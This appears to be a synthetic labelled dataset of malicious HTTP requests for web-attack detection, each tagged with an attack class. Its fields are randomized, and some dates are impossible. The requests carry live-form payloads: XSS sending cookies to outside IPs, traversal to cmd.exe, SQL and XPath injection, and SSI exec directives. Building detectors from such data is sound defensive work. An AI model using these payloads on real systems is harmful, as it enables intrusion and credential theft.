Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 279 5.34.104.253 "ycytrdqnsuf" 
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 13064
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44822
Start - Id: 46653
class: XSS
GET /t3sdm.ACQ8qlD/ojt3uio1ffAdNu8nie/eGz/uH@NBJpVHEP@NsS-t/pAnpnyn16iaewCeesoeh/oBpmM6nG/teZ/s5sdoun/lF34xt.php?a7o=taccess_loge&nKF=ntd&ebpNho=c%2Fi1&xAdNbEIQbbetweenmx=iGQL_&7zZzbodysamJ=4821223434&pdMr=8919&XGNC7IOU2HQ=3nk&iatl=qt HTTP/1.0
Host: 2.165.236.221
Connection: eavi9
Accept: */*;q=0.0
Accept-Charset: windows-1251;q=0.1, windows-1251, utf-7, macintosh, x-mac-chinesetrad
Accept-Encoding: <xml src   = "   javascript:   [window.open('http://52.167.151.168/iere.bin'+document.cookie);]     "    >
Accept-Language: *
Cache-Control: no-store
Client-ip: 222.189.28.231
Cookie2: $Version="067"
Date: Sun, 14 Feb 10 12:54:15 GMT
Expect: m1bhdo
From: mlCcpn@issz.fr
If-Modified-Since: Fri, 25 Jul 08 16:46:36 GMT
If-Match: "8El9sfmoTk34xfA"
If-Range: "Zl8VlOrGF@GqyLvP"
Max-Forwards: 88
Pragma: e5r=aoAZdl
Range: 1-74039,27-02
Referer: /nnBiol/mrfaar/bmet/nrtrcsis.asp
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 5.8; y1-sa; rv:9.6.0) Gecko/51496562
UA-OS: Mac OS X
Via: goti/1.8 243.60.80.172, 4.8 www.lH3an.html:43
Transfer-Encoding: tnso

null

End - Id: 46653
Start - Id: 42686
class: SqlInjection
POST /WopeniZNO6OJx.nsf? HTTP/1.0
Content-Length: 306
Content-Language: fye
Content-Encoding: deflate
Content-Location: /tieqeOdh/lmzj/nluE.asmx
Content-MD5: aWhlT2FtaGVoZmdjbWFURg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 11 Jun 06 02:33:23 CET
Host: www.odUwa.be
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: 'select   customer_phone '||'from     customers    '||'where  customer_surname='''||     lv_surname||'''   and customer_type=1';
Cache-Control: sanitcnt='lkeosjs'
Client-ip: 88.209.41.196
Date: Fri, 18 Mar 05 20:21:38 UTC
Expect: 2rerajnn=llDcy0Nh
If-Modified-Since: Thu, 16 Dec 04 15:30:44 UTC
If-Unmodified-Since: Wed, 17 Aug 05 02:44:50 GMT
If-None-Match: "4TUr5ZZ2oVrjECKhztvO"
If-Range: Tue, 17 Jun 08 06:09:56 UTC
Max-Forwards: 7
Pragma: a2hjE=gC3l
Proxy-Authorization: Basic cnNodDp2Zmt5bQ==
Authorization: Basic dG52T0k6aTRzbGVtbnQ=
Referer: http://Esmttaab.com/flrme0.php3
TE: gzip,trailers,trailers
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 2.3; ap-ta; rv:8.9.9) Gecko/09738317
Via: HTTP/3.5 222.117.162.130, HTTP/4.5 115.176.29.208
Transfer-Encoding: identity
Upgrade: aungB/9.6, csrh/5.1, dowc/2.0, ascmsp/5.9, 6jHua/3.4

or=tr:mjench&ahURkssnxsgn=h?=f&nn40laM3oagdln=ik8Qh-o&uqc3N.qit=e2xet&T2dLliketcNV=>hav:einscripteOrxp_&CbChEnaiydehn=5974377481&4eetlrh6t07mf=eiRuhkpy&buostAiiNs=es8daasesdxl6irdt&mconnectY04uUr_=Rdnc&unw=38771963&4Ki06fincludeacceptYr=ilibtvrTR;Vt2tmea&5g7btu=648&2nKfns=MteGedznt&ayeooic=040

End - Id: 42686
Start - Id: 44892
class: PathTransversal
GET /tG4J/d43TXBERBS_1qd/t@iB00.O/UTap@qI_apcF_5.jsp?se=2421&ui7tIeeu=ivCBWBJLqT2&iapvueesisifna=03997842&2Uo8lnrhia=kL7KxKGj67A&nseelyuNsur=%7E&eee=wZ8Z&nS5jn9yEoij4t=odc+shutdown&ud8ok=lyet%5C%26t%25%25e%29banetcatymyKmn&eyanlosseeoncKy=doc%28+++file%3A%2F%2F%2Fc%3A%2Fspnv%2FFdfs.xml+++%29&K7hG0xTX=504070&azu7rahtEio2bc=gxyR0.Y7Fl&Tweesssmn=apteusbe1tuaiadrup&csock_streamlfmetaJjh=menscripti+drdir1%27 HTTP/1.0
Host: 48.247.112.108:80
Connection: close
Accept: application/rtf;q=0.3, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.2
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 53.112.161.25
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Wed, 15 Nov 06 04:35:12 GMT
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: tshh@2vatra.org
If-Modified-Since: Sun, 08 Feb 09 22:28:32 UTC
If-Unmodified-Since: Sun, 14 Aug 05 03:03:12 GMT
If-Match: *
If-None-Match: "E9RC_Lc_L3ze1_K3M"
If-Range: *
Max-Forwards: 2199
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM ZG93bmRvZXJzaWN0ZUx0ZVRlMGtvZUw1cmFzZWVmcHQ4SDcw
Range: -129
Referer: /lohf.js
TE: trailers,chunked
Trailer: Via
User-Agent: jmDgi5eakrWeD3aixl
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 4.7 www.cllssyk.tiff
Transfer-Encoding: compress
Upgrade: a04E/0.2, dOen6p/3.6
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44892
Start - Id: 47307
class: XSS
GET /rThccek7e/ttf/ftpTg.0H/sruoSofr8erTpalo/nT/QwC/FtacceptO94I/oQ/Np6kXmbodyAWdb1Rnecho/iEyy/6uLAthro/1W-Q.jpeg?fjah9sr=ivAMY54GqL2&osrtBretip=Bt+8&lsns=6dmtbodynadminr&aEpvu=5&nr=8&bfirriomAl=js8metaie&eN=%3Cimg+src+++%3D+++%22++++eticor%3E++%22++++onmouseover+%3D++%22+++++%5Balert%28%27sbltehehd%27%29%3B%5D+%22++++%3E&cT=n+dmkoo5perlytou+&Z7mochaJvWRJ4scriptqN=wp-scriptv HTTP/1.1
Host: www.rtarn.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8;q=0.2, x-mac-chinesetrad, koi8-r;q=0.3, windows-1253, iso-10646-ucs-2;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: 7a3yntHD-saoao, nuEneh-5f;q=0.7, 682ejiee-eid;q=0.4, iu8-OSy;q=0.1, SteKwPoo-bians
Cache-Control: max-age=8681
Client-ip: 104.102.195.181
Cookie: rrirRhRd=4gtp+o
Cookie2: $Version="81"
Date: Sun, 17 May 09 18:53:22 GMT
ETag: W/"kmh.JRxb6nN3qMqK1"
Expect: Aaog
From: told@ol9na.de
If-Modified-Since: Fri, 19 Feb 10 21:43:02 GMT
If-Unmodified-Since: Tue, 07 Jul 09 16:28:04 CET
If-Match: *
If-None-Match: "_xafT1FZA3sPDfocKFso"
If-Range: Tue, 02 Dec 08 22:15:20 CET
Max-Forwards: 6063
MIME-Version: 0.1
Pragma: ep5te=pe08
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: eljvaE dmsot=omnus5
Range: 498-
Referer: http://www.sssdtRg.biz/tjdsn.pdf
TE: deflate,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (Windows; U; Win98 3.0; mp-Gn; rv:0.4.8) Gecko/61223855
UA-CPU: Sparc
UA-Disp: 557,9358,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5306x1733
Via: FTP/4.7 www.xrnji.gif:81
Transfer-Encoding: deflate
Upgrade: te4gye/2.3, elsad/9.1, hedM/8.6, a0ndP/0.7
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 46.124.140.98
X-Serial-Number: 1360027
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47307
Start - Id: 44124
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.dcnalrhteh.st
Connection: close
Accept: text/*;q=0.0, application/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.7, identity, gzip;q=0.8
Accept-Language: *
Cache-Control: min-fresh=962
Client-ip: 196.173.120.66
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Sat, 03 Jun 06 24:55:12 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Thu, 27 Apr 06 12:55:33 CET
If-Unmodified-Since: Mon, 28 Feb 05 04:18:59 CET
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: "M5VFg45@l@shuRpOl-.@"
Max-Forwards: 345
MIME-Version: 3.4
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM a2Rvb2xtZ2h1aWFqcnNiZGVwaGVwdHNlcHRFN2xzdHNsNUU=
Range: 2856-325921,765830-7785,3752-597
Referer: /5bugl/mkpecm/e9hd/8reaGh/heir.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (X11; U; Solaris 3.7; b3-tk; rv:4.3.8) Gecko/63932163
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/4.7 100.67.12.168, HTTP/7.0 19.235.205.14:604
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44124
Start - Id: 49110
class: XPathInjection
GET /jgCYKN2l@@FO1J/hmd1s0tcieumtreJ/igs5d6xitaer0/2op9ht-XVVi4Q/SW/ns/tr1Mt7KWVds88gMt8/iQkFVGSG_/pTtaoesfedrope0nft.js?iu=%3Btmh&nFoxnx=9VlKmpGGw6P&rlejzUkh=48228&ronl0a04tsfa=nnnue8ik&drodejS=986598&cytaseih=z&Ta5afnaierqab=e9rno&vjLRsR@_styleZ=ecoedivuoole%26e&n3fnt=109065&ds=hee%27+++++or++++6+++++%3C++++count%28path%2Fchild%3A%3A*%29+++or+++%27ei%27+%3D%27&thD=313&0jSpQhttps=5573478&WdXGUdAprocessing-instructionexec=ieixfyk%7Cun+pq HTTP/1.0
Host: www.omtcmtiawe.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 55.5.98.251
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 03 Sep 06 05:16:59 GMT
ETag: "HJSkhgk7YNZkVCt5Kax"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 8.7
Pragma: 1jjer=aiihc
Proxy-Authorization: oevat nzIsEaox=dredr
Authorization: Digest uri=/tsd2m/na6fn.png
Range: 21992-101995,769527-91853,911330-
Referer: http://DYlees5o.ch/eqecnr/ybir/ogres1/2rzneL/j2nts.mp3
TE: trailers,trailers,chunked;q=0.9
Trailer: Referer
User-Agent: orernnengTn
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49110
Start - Id: 49297
class: XPathInjection
GET /aT7WkkCFz.Lr1NAHa5ax/7cfRres/fMUsGeDcV/ye2ft4hodei/w2S86jHn1vidZOrT/eoannH/njR7dEO2I5@gEto5taFJ/4e8staxoyh/igdansjatyh9/GeeN/utcesd2CT/xSDVd_fe.php4?an6frsuo=binrwe+I%3EKei&iiVosnubaflV3e=susQ8a%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27ptsotgnn%27+++%3D++++%27&apua31nmompaj=883370&R3l=oDh&rwBNK_Fg=o6jW9z8Pjj HTTP/1.1
Host: www.xdaani.uk
Connection: close
Accept: text/html;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, identity, compress, compress, identity;q=0.7
Accept-Language: uCcAE-d, Cte-rddha5ce, i-eszerra;q=0.5, Dflys-Bgsi3hA;q=0.2
Cache-Control: thts='rteo'
Client-ip: 249.173.49.26
Cookie: arh=9;uoemerdEB=23684;aa=txmlobjectidl;gyd=h deleteuu;tear8el=8sh
Cookie2: $Version="213"
Date: Mon, 04 Feb 08 05:21:13 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 05 Jun 04 03:18:20 GMT
If-Unmodified-Since: Thu, 26 May 05 06:10:19 CET
If-Match: "h.EAPtYo7V.8JSq0r"
If-None-Match: *
If-Range: *
Max-Forwards: 0695
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic b2hhaFRhOjJwbGVoZg==
Range: -843
Referer: /en5g.png
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 3.4; iI-n9; rv:5.8.3) Gecko/61960745
UA-CPU: MIPS
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: 8.7 www.R8ag.htm
Transfer-Encoding: identity
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 104.98.97.132
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49297
Start - Id: 40864
class: SSI
GET /QPQAt0a.2/rconnectQ7XAMuyM.shtml?Nic2ibnwA=0538663&lnxSoroide9ha3h=iR5&ae0asmuwoh=854&caxardoontEita=2&o7-QK=5BbOte2&Lwp-perlfupdatePUM=62754538&haiusrr9tl=857073&vrRWXbprD=42362&rsaoSa=%3C%21--+%23odbc+++statement+++%3D+%22select++atSneb%2C+++ppc%2C+++aul7aspn+++from+++eoft++order+by+9%2C++29%2C++8%22+--%3E HTTP/1.0
Host: 33.168.89.20
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ln-erhr
Cache-Control: max-stale
Client-ip: 175.185.183.88
Cookie: 7rshoit5muZn07=0064384;Na=tm3rM2;niu=a inputjoifi5wB
Cookie2: $Version="380"
Date: Tue, 30 Mar 10 13:29:54 GMT
ETag: W/"Dw7gUMwDZeafFwdFg@Eu"
Expect: ahutgh=Zrti
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Tue, 29 Dec 09 24:42:30 UTC
If-Match: "J9xuKGeW0UoA1a74"
If-None-Match: "UG7kmIY9R5TH53PVf"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 01
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: otaub ripltoU5=3ehoeban
Range: -375,-4
Referer: /Oeu3ot.mpg
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/3.2 (Windows; U; Win98 3.5; sp-ng; rv:1.6.3) Gecko/85557157
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40864
Start - Id: 42498
class: SqlInjection
GET /aiezobnIE/o9n.js?imgo=9&enooatkc4d=++OR+++2++%3E++++1&hehn8c=tDQwOB8uSQ&heEel=orid%24andO%3Dcxwherepe+sy&xIe=ao4l4&amurItNmtnehenr=98 HTTP/1.1
Host: www.m5dhA.be
Connection: close
Accept: audio/x-wav, text/*;q=0.3, audio/*
Accept-Charset: iso-8859-8, x-mac-greek, x-mac-icelandic;q=0.1, iso-8859-2, windows-1254
Accept-Encoding: 
Accept-Language: rpcuhoc-e;q=0.1, bqo6see-o, 5noew-Notn6Ph;q=0.9
Cache-Control: min-fresh=38194
Client-ip: 196.189.248.125
Cookie: om2bon2eaerebn=l;eroa8rgterhheo=asdhETiomOshv;wnlraaAfsEnetnh=e@5lB.N@7e;oeebhd=6434;IgVh6S5openB6xh=ire0d
Cookie2: $Version="45"
Date: Thu, 25 Aug 05 23:34:38 GMT
ETag: W/"R_iyxOFyTu-4qGue"
Expect: eb8e
From: sheo@RafNi.uk
If-Modified-Since: Mon, 22 Feb 10 01:17:36 GMT
If-Unmodified-Since: Fri, 20 Jun 08 08:02:42 GMT
If-Match: "z3ouFUbDR7fBnx6a"
If-None-Match: "3XiRonkAkr4ovqs"
If-Range: "P4jQsI-mzmPyjr51"
Max-Forwards: 1261
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 7-59040
Referer: /6hnc.php
TE: gzip;q=0.7,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 9.6; ri-tn; rv:6.5.2) Gecko/06718897
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.3 11.222.87.252, 4.3 151.61.44.116
Transfer-Encoding: compress
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 210 56.86.237.225 "csttoifnOdeql" "Sat, 01 Mar 08 16:31:34 CET"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 029543372781579317
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42498
Start - Id: 49533
class: XPathInjection
GET /ooetntmaAernxaiasne/o1ekZwKc.nsf?a4to=8127&nulzosMu2a6ab=sdzB&r0saGe4boot.inisF=36965&eir5oh6tr=4Bac%27+or++6+++%3C+++count%28path%2Fchild%3A%3A*%29+or+%27heosiheh%27++%3D+++%27&ttao1ll=gtmp&oxrrp3Oq=o%3A&cesihna=122283186&icn=83105470&dHdchp8l=pOygEd+w-logm HTTP/1.0
Host: 88.52.190.143
Connection: afuC
Accept: application/*, application/rtf, text/xml;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=69231
Client-ip: 91.134.19.242
Cookie: onc2oof=ises/tRn8iott
Cookie2: $Version="18"
Date: Sun, 05 Nov 06 18:48:56 CET
ETag: W/"KtLgebekwR@UKJq0g"
Expect: 100-continue
From: teetaaso@eakeiyqkca.gov
If-Modified-Since: Tue, 18 Jul 06 16:11:59 UTC
If-Unmodified-Since: Sat, 10 Apr 10 21:39:15 CET
If-Match: *
If-None-Match: "kAxwiNt-5bsypFbqyV"
If-Range: Tue, 19 Jan 10 01:27:44 UTC
Max-Forwards: 2
MIME-Version: 2.6
Pragma: Nn5d7e=e
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: Basic YWsyaGVhaDI6Y2dvb3NT
Range: -57965,183531-,88063-39
Referer: http://etsbSs.net/shnte0/reHise/4u6s2ro.bin
TE: deflate;q=0.5
Trailer: Connection
User-Agent: 2lreL/4.3.2.4
UA-CPU: x86
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 661x844
Via: 6.6 www.tsvro.tiff, trge/5.7 7.179.24.67, 2.3 16.89.67.36
Transfer-Encoding: gzip
Upgrade: 7o6mn6/1.4, twjeP/1.1, eevzn/6.2
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 1653383151363869
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49533
Start - Id: 45565
class: PathTransversal
GET /omteitwsimt4te/Ubgsound/hiduwdSSngwhe2d32at/NImdAY7ephp8nph-Gwxe/KA55QhomePAQ5EESEG/qWB/ioWstyle7_/eA_Niz.asmx?rngmEzeui9=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&iayItnnc0=nqj3zSxBXv. HTTP/1.1
Host: 165.75.81.196:3467
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: nntsshie-o;q=0.9
Cache-Control: min-fresh=0
Client-ip: 164.135.230.128
Cookie: 26ejuiimmAao=nRil'sp h%ud;AstdinallPwGinboot.iniEb=8Xip@exXl;qrpLOlhhee=taHY9YLf3t;anr6fp=08496;tiemrEBwoi=0826195030;t4elqo9=cef1nehnde8EU
Cookie2: $Version="88"
Date: Sun, 10 Jun 07 15:33:39 CET
ETag: "IiAPylRuCsm05lJzLT"
Expect: 7Sjsoaml
From: kccnlkv2@rodignu.de
If-Modified-Since: Fri, 28 May 04 19:58:07 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "ClOJ79aKmE72qeAOyhBb"
If-None-Match: *
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 24
MIME-Version: 9.4
Pragma: bni0ia=czmr9c
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest nonce
Range: -2
Referer: /g2srnt/ebar/nss5t/eIenNh.mpg
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: Upgrade
User-Agent: htsqolzeloi4s3jhasq
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 220x9820
Via: 5.6 20.210.5.114
Transfer-Encoding: compress
Upgrade: ggC/2.3, d2sU/5.6, shIm/3.2, ehs/6.3
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 64.169.57.223
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45565
Start - Id: 40260
class: SSI
GET /kdV6ByyTfnxpd@RKUyc/sxX/MlasE2cooueeq2pHeIe/tAely4y9neers/nasieeisntcroseoin9f/emGXoMvyQ9_OWXlbZ/bbE-O7j8xDtZ@-c/qthhh284BnsbhbC2br/bxVytfc1BCrWy_/rJv8fO9EdYOZCFnt-MC.exe?j8ne9ttn=0231&xtEa=eB0d8Tb&aiseTlcjzobwt=ennErntVtg6g8g&0RSGGvpIln7=57287892&oseee=3sorlEa&aynfetduslna7a=+nsor&ro=38&sanroN6hs9=5in5o4tdwiny&hefilennsree=asNhshl&yacta0yecid=yBin5hW8&i8pkaeliht6=%3C%21--+++++%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5CExe%5Caj%5Crat.exe++d%3A%5CedUReH%5Cwww.tinttrstto.org%5Cltuifdce%5Cdatabase.mdb++++%2Fx+exporttofoxpro%22--%3E&3kdr=asml0Ooy&jpe=6&fSa=+icnpe1nptv+u&m1rwmenlAwaie=62806681 HTTP/1.0
Host: www.tdmrIt.st
Connection: close
Accept: video/*;q=0.1, text/*;q=0.0, video/mpeg;q=0.6
Accept-Charset: iso-8859-15;q=0.1, x-mac-ce, cp-936, windows-1252;q=0.4
Accept-Encoding: identity;q=0.4, gzip, compress;q=0.7
Accept-Language: *;q=0.4
Client-ip: 181.252.138.222
Date: Wed, 28 Feb 07 02:09:36 CET
From: 7Aiet@9het.it
If-Match: "JZMs7jva-283qAm"
Authorization: Basic Z1RvaWRtczY6b3NsZQ==
Referer: /satyed/seathhoo/9n1sm/plschI.swf
User-Agent: s.YLJts5 http://www.sez2dfti.gov
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40260
Start - Id: 47850
class: XSS
GET /0nwdlkn/0g1LLLfbZUop/1EqP8onpeYeesk/e2rw4dsyoonfeaa7/7Rqcll8uhrOlosgdisa/tj2JXocBA6x/homeAcopyN_OD1iB/0uuRtC-LM_Hselect/oOjRwpasswd7c.GV_/e-5HN7MU.asp?CyejnhKazd1ts=219&slrNdoa=27al%3D%2Bqcelai%5Cu&n1=%26%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F199.217.132.240%2Fme.jsp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&iframecCWn=788187&lyS1iaiunremra=tigstY&sshgles6w=hdo&J647iate=933&eu=4%24deleteqtWu5%3E7gfa0g&6h=q+sygrlayngmne&msi=58745&mitsoah=oeHb&ug=13674&Freplacekaccess_log=398181&kyInelaateae=smb HTTP/1.1
Host: 250.159.171.23
Connection: close
Accept: video/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=524
Client-ip: 152.45.178.78
Cookie: gTeoepa=e9eje esuy2sL;v9NTE4=aXe5Y1hy;dIeej=070869
Cookie2: $Version="459"
Date: Thu, 04 Aug 05 19:01:55 GMT
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Sun, 24 Jan 10 12:59:42 CET
If-Unmodified-Since: Sat, 20 Mar 10 04:40:22 GMT
If-Match: "KZDRXCa3Xxp@Vy_t."
If-None-Match: "voB8RggetRejnzwO"
If-Range: Thu, 20 Mar 08 18:12:35 GMT
Max-Forwards: 3913
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest realm
Range: 595606-7,222673-07
Referer: /Teetlnn/eitni/SStn/cbthpli/sitso.avi
TE: deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: h5JjnKQsFz http://www.tta9t.cz
UA-CPU: x86
UA-Disp: 4309,162,32
Via: maey/7.0 www.dgsostt.jpg, FTP/2.0 64.76.197.235:1
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 47850
Start - Id: 46887
class: XSS
PUT /lcunti9bntc/0URzHaIO.jpg? HTTP/1.1
Content-Length: 311
Content-Language: ehftA
Content-Encoding: gzip
Content-Location: /e4ot/chp73y.conf
Content-MD5: ZGVzdHFwd2owZnNuYXJIZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Sun, 29 Aug 04 24:19:36 CET
Host: www.ueTrOd.be
Connection: eatbgox
Accept: */*;q=0.4
Accept-Charset: iso-8859-8-i;q=0.2
Accept-Encoding: *
Accept-Language: ipztiae-mdacsoep;q=0.4, r-shei;q=0.7, lN-4;q=0.2, dEeho-wlcoce, 9-uctye
Cache-Control: max-stale
Client-ip: 164.249.24.153
Cookie: jossbrmAiOit=dh4b@JCm;eisernzav=py60clhb
Cookie2: $Version="4"
Date: Sat, 22 Jan 05 14:36:20 GMT
ETag: W/"P63_8lnCuOkf3hTuY"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 05 Feb 04 19:46:31 GMT
If-Unmodified-Since: Sun, 08 Jan 06 14:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 02 Mar 08 03:38:09 UTC
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
